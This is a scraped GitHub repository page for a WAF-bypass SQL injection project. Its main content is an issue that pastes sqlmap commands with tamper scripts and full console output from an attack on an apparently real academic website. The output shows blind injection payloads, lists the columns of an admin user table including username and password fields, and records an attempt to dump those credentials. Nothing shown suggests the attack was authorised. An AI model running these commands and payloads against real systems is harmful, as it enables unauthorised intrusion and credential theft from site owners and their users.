gagaltotal / bypass-waf-sqlmap Goto Github PK
View Code? Open in Web Editor NEWBypass WAF SQL Injection SQLMAP
Home Page: https://gagaltotal.github.io/
bypass-waf-sqlmap's Introduction
bypass-waf-sqlmap's People
Contributors
Stargazers
Watchers
Forkers
nbg0x1 pycoder1 rukaachan gkfnf devendermahto helcaraxeals matheuscezar l1ves andioioi scriptidiot ktzgraph mj-565 anthonymcqueen21 5l1v3r1 0rx1 im-hanzou sashka3076 zxc2007 attacker-codeninja cyberindia1 dr-maspix istoliving ikpehlivan pbsopankar yippeekayay xqd-ai oscargilg1 svolkanbilgic cellslogic oakkaya anonyvietofficial ch355-fch pwm-on meetgyn aviksaikat 4lph40iii qafro1 cesarmsouza darknesschieftain go-bi shimon03 m0nk336 cyb3rhex a1k-ghaz1 superluosheng websecresearch invisiblebunny abdullahkiady7 mmillerxyzbypass-waf-sqlmap's Issues
[WARNING] unable to retrieve the number of column(s)
python sqlmap.py -r akademik.txt --identify-waf --random-agent --tamper="between,randomcase,space2comment" --level=5 --risk=3 --string="Anda" -D absensi -T adminuser --columns --batch --threads=10 --fresh-queries
___
H
___ ["]__ ___ ___ {1.3.4#stable}
|_ -| . [)] | .'| . |
|| ["]|||__,| |
||V... || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:55:10 /2021-11-14/
[20:55:10] [INFO] parsing HTTP request from 'akademik.txt'
[20:55:10] [INFO] loading tamper module 'between'
[20:55:10] [INFO] loading tamper module 'randomcase'
[20:55:10] [INFO] loading tamper module 'space2comment'
[20:55:11] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080924 Ubuntu/8.04 (hardy) Firefox/2.0.0.17' from file '/home/kali/sqlmap-1.3.4/txt/user-agents.txt'
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[20:55:11] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:55:11] [INFO] testing connection to the target URL
[20:55:12] [INFO] heuristics detected web page charset 'ascii'
[20:55:12] [INFO] testing if the provided string is within the target URL page content
[20:55:13] [INFO] using WAF scripts to detect backend WAF/IPS protection
[20:55:16] [WARNING] WAF/IPS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thnakademik=2021/2022' AND 1170=1170-- cywK&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
Type: time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: thnakademik=2021/2022' AND 9655=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- YzNx&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
[20:55:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:55:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Linux Ubuntu
web application technology: Apache, PHP 5.5.9
back-end DBMS: Microsoft SQL Server 2000
[20:55:16] [INFO] fetching columns for table 'adminuser' in database 'absensi'
[20:55:16] [INFO] retrieved: 10
[20:55:21] [INFO] retrieving the length of query output
[20:55:21] [INFO] retrieved: 5
[20:55:35] [INFO] retrieved: Aktif
[20:55:35] [INFO] retrieving the length of query output
[20:55:35] [INFO] retrieved: 3
[20:55:45] [INFO] retrieved: int
[20:55:45] [INFO] retrieving the length of query output
[20:55:45] [INFO] retrieved: 2
[20:55:55] [INFO] retrieved: FA
[20:55:55] [INFO] retrieving the length of query output
[20:55:55] [INFO] retrieved: 3
[20:56:05] [INFO] retrieved: int
[20:56:05] [INFO] retrieving the length of query output
[20:56:05] [INFO] retrieved: 3
[20:56:08] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[20:56:08] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
[20:56:15] [INFO] retrieved: FHA
[20:56:15] [INFO] retrieving the length of query output
[20:56:15] [INFO] retrieved: 3
[20:56:25] [INFO] retrieved: int
[20:56:25] [INFO] retrieving the length of query output
[20:56:25] [INFO] retrieved: 3
[20:56:37] [INFO] retrieved: FUA
[20:56:37] [INFO] retrieving the length of query output
[20:56:37] [INFO] retrieved: 3
[20:56:46] [INFO] retrieved: int
[20:56:46] [INFO] retrieving the length of query output
[20:56:46] [INFO] retrieved: 10
[20:57:16] [INFO] retrieved: IP_Address
[20:57:16] [INFO] retrieving the length of query output
[20:57:16] [INFO] retrieved: 7
[20:57:34] [INFO] retrieved: varchar
[20:57:34] [INFO] retrieving the length of query output
[20:57:34] [INFO] retrieved: 6
[20:57:52] [INFO] retrieved: Jadwal
[20:57:52] [INFO] retrieving the length of query output
[20:57:52] [INFO] retrieved: 3
[20:58:02] [INFO] retrieved: int
[20:58:02] [INFO] retrieving the length of query output
[20:58:02] [INFO] retrieved: 10
[20:58:30] [INFO] retrieved: Last_Login
[20:58:30] [INFO] retrieving the length of query output
[20:58:30] [INFO] retrieved: 7
[20:58:47] [INFO] retrieved: varchar
[20:58:47] [INFO] retrieving the length of query output
[20:58:47] [INFO] retrieved: 12
[20:59:18] [INFO] retrieved: Name
[20:59:18] [INFO] retrieving the length of query output
[20:59:18] [INFO] retrieved: 7
[20:59:35] [INFO] retrieved: varchar
[20:59:35] [INFO] retrieving the length of query output
[20:59:35] [INFO] retrieved: 9
[20:59:57] [INFO] retrieved: Name_User
[20:59:57] [INFO] retrieving the length of query output
[20:59:57] [INFO] retrieved: 7
[21:00:16] [INFO] retrieved: varchar
[21:00:16] [INFO] retrieving the length of query output
[21:00:16] [INFO] retrieved: 8
[21:00:36] [INFO] retrieved: Password
[21:00:36] [INFO] retrieving the length of query output
[21:00:36] [INFO] retrieved: 7
[21:00:53] [INFO] retrieved: varchar
Database: absensi
Table: adminuser
[10 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| Aktif | int |
| FA | int |
| FHA | int |
| FUA | int |
| IP_Address | varchar |
| Jadwal | int |
| Last_Login | varchar |
| Name | varchar |
| Name_User | varchar |
| Password | varchar |
+--------------+---------+
[21:00:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times, 404 (Not Found) - 1 times
[21:00:53] [INFO] fetched data logged to text files under '/output/www.website.com'
python sqlmap.py -r akademik.txt --identify-waf --random-agent --tamper="between,randomcase,space2comment" --level=5 --risk=3 --string="Anda" -D absensi -T adminuser -C Name,Name_User,Password --dump --batch --threads=10 --fresh-queries
___
H
___ [.]__ ___ ___ {1.3.4#stable}
|_ -| . [.] | .'| . |
|| [,]|||__,| |
||V... || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:06:52 /2021-11-14/
[21:06:52] [INFO] parsing HTTP request from 'akademik.txt'
[21:06:52] [INFO] loading tamper module 'between'
[21:06:52] [INFO] loading tamper module 'randomcase'
[21:06:52] [INFO] loading tamper module 'space2comment'
[21:06:52] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5' from file '/home/kali/sqlmap-1.3.4/txt/user-agents.txt'
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[21:06:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[21:06:53] [INFO] testing connection to the target URL
[21:06:54] [INFO] heuristics detected web page charset 'ascii'
[21:06:54] [INFO] testing if the provided string is within the target URL page content
[21:06:55] [INFO] using WAF scripts to detect backend WAF/IPS protection
[21:06:57] [WARNING] WAF/IPS product hasn't been identified
sqlmap resumed the following injection point(s) from stored session:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thnakademik=2021/2022' AND 1170=1170-- cywK&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
Type: time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: thnakademik=2021/2022' AND 9655=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- YzNx&tokenid=1b503a83f847f4e4ebe28769d12a8fe8485c0954
[21:06:57] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:06:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Linux Ubuntu
web application technology: Apache, PHP 5.5.9
back-end DBMS: Microsoft SQL Server 2000
[21:06:57] [INFO] fetching entries of column(s) 'Name, Name_User, Password' for table 'adminuser' in database 'absensi'
[21:06:57] [INFO] fetching number of column(s) 'Name, Name_User, Password' entries for table 'adminuser' in database 'absensi'
[21:06:58] [INFO] retrieved:
[21:06:59] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[21:06:59] [WARNING] time-based comparison requires larger statistical model, please wait......................... (done)
[21:07:15] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:07:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:07:16] [WARNING] unable to retrieve the number of column(s) 'Name, Name_User, Password' entries for table 'adminuser' in database 'absensi'
[21:07:16] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[21:07:16] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/www.website.com
switch/option '--identify-waf' is obsolete
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.